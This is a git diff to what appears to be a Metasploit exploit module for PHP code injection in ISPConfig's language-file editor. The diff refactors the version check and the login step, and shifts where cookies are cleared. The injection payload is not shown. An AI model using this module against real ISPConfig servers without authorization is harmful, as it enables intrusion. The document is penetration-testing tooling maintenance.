resolved: changes

happybear-21 · happybear-21 · commit 20134b5cede0 · 2025-07-01T15:37:10.000+05:30
diff --git a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -74,38 +74,25 @@ def initialize(info = {})
   def check
     print_status('Checking if the target is ISPConfig...')
     # Always try to log in and parse version, since credentials are required
-    # Clear any existing cookies before login
-    cookie_jar.clear
-    
-    login_res = send_request_cgi!({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'login/'),
-      'vars_post' => {
-        'username' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD'],
-        's_mod' => 'login'
-      },
+    # cookie_jar.clear (handled in exploit)
+    return CheckCode::Safe unless authenticate
+    # Try to access the dashboard or settings page
+    settings_res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
       'keep_cookies' => true
     })
-    if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
-      # Try to access the dashboard or settings page
-      settings_res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
-        'keep_cookies' => true
-      })
-      if settings_res
-        doc = settings_res.get_html_document
-        # Try to find version in a span, div, or similar element
-        version_element = doc.at('//p[@class="frmTextHead"]')
-        if version_element
-          version_text = version_element.text
-          version = version_text.split(":")[1].gsub(" ","")
-          version = Rex::Version.new(version)
-          if version < Rex::Version.new('3.2.11p1')
-            print_good("ISPConfig version detected: #{version_text}")
-            return CheckCode::Vulnerable("Version: #{version_text}")
-          end
+    if settings_res
+      doc = settings_res.get_html_document
+      # Try to find version in a span, div, or similar element
+      version_element = doc.at('//p[@class="frmTextHead"]')
+      if version_element
+        version_text = version_element.text
+        version = version_text.split(":")[1].gsub(" ","")
+        version = Rex::Version.new(version)
+        if version < Rex::Version.new('3.2.11p1')
+          print_good("ISPConfig version detected: #{version_text}")
+          return CheckCode::Vulnerable("Version: #{version_text}")
         end
       end
     end
@@ -116,7 +103,7 @@ def authenticate
     print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'login'),
+      'uri' => normalize_uri(target_uri.path, 'login/'),
       'vars_post' => {
         'username' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
@@ -262,6 +249,7 @@ def inject_payload
   end
 
   def exploit
+    cookie_jar.clear
     unless authenticate
       fail_with(Failure::NoAccess, 'Login failed')
     end
